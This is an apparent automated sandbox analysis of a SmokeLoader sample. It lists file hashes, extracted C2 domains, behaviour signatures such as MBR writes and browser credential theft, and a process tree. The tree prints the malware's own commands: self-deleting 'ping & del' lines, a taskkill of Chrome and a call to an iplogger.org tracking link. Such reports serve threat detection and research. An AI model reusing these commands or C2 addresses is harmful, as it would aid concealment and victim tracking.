Analysis

  • max time kernel
    302s
  • max time network
    305s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    06-03-2021 07:08

General

  • Target

    Setup.exe

  • Size

    4.2MB

  • MD5

    afd51e2ff7beac4d0c88d8f872d6d0d5

  • SHA1

    185fd4793db912410de63ac7a5a3b1ac9c266b38

  • SHA256

    cecdc8bd4344647b2182696cf04e1db4fbb29aee6b46811999008901910b5c19

  • SHA512

    eed33fd55a82fceea21f522a6c59d3e318d7e73c86e9b1f039e37b3ccd6c0b58df24dabfcb71d8ccb818dd236cc329804d6a947240619ad26aed8713fe19a418

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://naritouzina.net/

http://nukaraguasleep.net/

http://notfortuaj.net/

http://natuturalistic.net/

http://zaniolofusa.net/

rc4.i32
rc4.i32

Signatures

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Nirsoft 6 IoCs
  • Executes dropped EXE 11 IoCs
  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 11 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 37 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 15 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
    1⤵
    • Writes to the Master Boot Record (MBR)
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:3084
    • C:\Windows\SysWOW64\msiexec.exe
      msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
      2⤵
      • Enumerates connected drives
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:3924
    • C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
      C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 0011 installp1
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Writes to the Master Boot Record (MBR)
      • Suspicious use of SetThreadContext
      • Checks SCSI registry key(s)
      • Suspicious use of WriteProcessMemory
      PID:2156
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        3⤵
          PID:2424
        • C:\Users\Admin\AppData\Roaming\1615018414543.exe
          "C:\Users\Admin\AppData\Roaming\1615018414543.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615018414543.txt"
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:3256
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe"
          3⤵
            PID:2880
          • C:\Users\Admin\AppData\Roaming\1615018419215.exe
            "C:\Users\Admin\AppData\Roaming\1615018419215.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615018419215.txt"
            3⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:2324
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe"
            3⤵
              PID:3864
            • C:\Users\Admin\AppData\Roaming\1615018424668.exe
              "C:\Users\Admin\AppData\Roaming\1615018424668.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615018424668.txt"
              3⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              PID:2260
            • C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
              C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
              3⤵
              • Executes dropped EXE
              PID:1764
            • C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
              "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Writes to the Master Boot Record (MBR)
              PID:2432
            • C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe
              C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent
              3⤵
              • Executes dropped EXE
              PID:744
              • C:\Users\Admin\AppData\Local\Temp\is-61UF8.tmp\23E04C4F32EF2158.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-61UF8.tmp\23E04C4F32EF2158.tmp" /SL5="$60192,762308,115712,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent
                4⤵
                • Executes dropped EXE
                • Drops file in Program Files directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of FindShellTrayWindow
                PID:652
                • C:\Program Files (x86)\DTS\seed.sfx.exe
                  "C:\Program Files (x86)\DTS\seed.sfx.exe" -pX7mdks39WE0 -s1
                  5⤵
                  • Executes dropped EXE
                  • Drops file in Program Files directory
                  PID:3132
                  • C:\Program Files (x86)\Seed Trade\Seed\seed.exe
                    "C:\Program Files (x86)\Seed Trade\Seed\seed.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious behavior: MapViewOfSection
                    PID:2916
                • C:\Windows\SysWOW64\cmd.exe
                  "cmd.exe" /c "start https://iplogger.org/14Zhe7"
                  5⤵
                  • Checks computer location settings
                  PID:976
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"
              3⤵
                PID:4100
                • C:\Windows\SysWOW64\PING.EXE
                  ping 127.0.0.1 -n 3
                  4⤵
                  • Runs ping.exe
                  PID:4160
            • C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
              C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 200 installp1
              2⤵
              • Executes dropped EXE
              • Writes to the Master Boot Record (MBR)
              • Checks SCSI registry key(s)
              • Suspicious use of WriteProcessMemory
              PID:2568
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c taskkill /f /im chrome.exe
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2204
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im chrome.exe
                  4⤵
                  • Kills process with taskkill
                  PID:2748
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1332
                • C:\Windows\SysWOW64\PING.EXE
                  ping 127.0.0.1 -n 3
                  4⤵
                  • Runs ping.exe
                  PID:3928
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2840
              • C:\Windows\SysWOW64\PING.EXE
                ping 127.0.0.1 -n 3
                3⤵
                • Runs ping.exe
                PID:3932
          • C:\Windows\system32\msiexec.exe
            C:\Windows\system32\msiexec.exe /V
            1⤵
            • Enumerates connected drives
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4088
            • C:\Windows\syswow64\MsiExec.exe
              C:\Windows\syswow64\MsiExec.exe -Embedding 53F05FB0DC6D7957A0EDD309300C0B98 C
              2⤵
              • Loads dropped DLL
              PID:2244
          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
            1⤵
            • Drops file in Windows directory
            • Modifies Internet Explorer settings
            • Modifies registry class
            • Suspicious use of SetWindowsHookEx
            PID:1864
          • C:\Windows\system32\browser_broker.exe
            C:\Windows\system32\browser_broker.exe -Embedding
            1⤵
            • Modifies Internet Explorer settings
            PID:2292
          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
            1⤵
            • Modifies registry class
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2224
          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
            1⤵
            • Modifies Internet Explorer settings
            • Modifies registry class
            PID:2444
          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
            1⤵
            • Modifies registry class
            PID:4500

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • memory/652-70-0x00000000001E0000-0x00000000001E1000-memory.dmp

            Filesize

            4KB

          • memory/744-69-0x0000000000401000-0x000000000040C000-memory.dmp

            Filesize

            44KB

          • memory/2156-14-0x0000000010000000-0x000000001033E000-memory.dmp

            Filesize

            3.2MB

          • memory/2156-17-0x0000000003770000-0x0000000003C1F000-memory.dmp

            Filesize

            4.7MB

          • memory/2424-23-0x0000023F2FC10000-0x0000023F2FC11000-memory.dmp

            Filesize

            4KB

          • memory/2424-21-0x0000000010000000-0x0000000010057000-memory.dmp

            Filesize

            348KB

          • memory/2568-18-0x0000000002DE0000-0x000000000328F000-memory.dmp

            Filesize

            4.7MB

          • memory/2828-85-0x0000000001200000-0x0000000001216000-memory.dmp

            Filesize

            88KB

          • memory/2880-35-0x0000012DC98C0000-0x0000012DC98C1000-memory.dmp

            Filesize

            4KB

          • memory/2916-82-0x0000000000400000-0x000000000040A000-memory.dmp

            Filesize

            40KB

          • memory/2916-81-0x0000000000030000-0x000000000003A000-memory.dmp

            Filesize

            40KB

          • memory/2916-79-0x0000000003040000-0x0000000003041000-memory.dmp

            Filesize

            4KB

          • memory/3084-2-0x0000000010000000-0x000000001033E000-memory.dmp

            Filesize

            3.2MB

          • memory/3864-42-0x000002C06D3C0000-0x000002C06D3C1000-memory.dmp

            Filesize

            4KB